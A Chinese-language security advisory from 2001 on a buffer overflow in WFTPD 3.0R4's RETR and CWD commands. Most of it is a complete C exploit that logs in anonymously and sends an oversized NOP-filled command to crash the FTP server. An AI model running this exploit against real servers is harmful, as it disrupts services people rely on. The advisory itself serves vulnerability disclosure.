WFTPD 'RETR' 和 'CWD'存在缓冲溢出漏洞发布时间:2001-04-27 更新时间:2001-04-27 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Texas Imperial Software WFTPD 3.0R4详细描述 对'RETR'或者'CWD'命令发送不合法的超长的字符串,可以导致WFTPD 服务程序崩溃,并可能导致攻击者执行任意代码。 测试代码 /* WFTPD Pro 3.00 R4 Buffer Overflow exploit written by Len Budney */ #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #define BUFSIZE 32774 #define CMD "RETR " /* Alt: use "CWD " and set OFFSET to 4. */ #define OFFSET 5 void main(){ int sockfd, s; struct sockaddr_in victim; char buffer[BUFSIZE]; char exploitbuffer[BUFSIZE]={CMD}; char recvbuffer[BUFSIZE]; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd == -1)perror("socket"); victim.sin_family=AF_INET; victim.sin_addr.s_addr=inet_addr("192.168.197.129"); victim.sin_port=htons(21); s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim)); if(s == -1) perror("connect"); recv(sockfd, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0); recv(sockfd, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0); recv(sockfd, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '\0',sizeof(recvbuffer)); memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2); sprintf(buffer,"%s\r\n",exploitbuffer); send(sockfd, buffer , sizeof(buffer),0); recv(sockfd, recvbuffer, sizeof (recvbuffer),0); close(sockfd); _exit(0); } 解决方案 尚无 相关信息 |
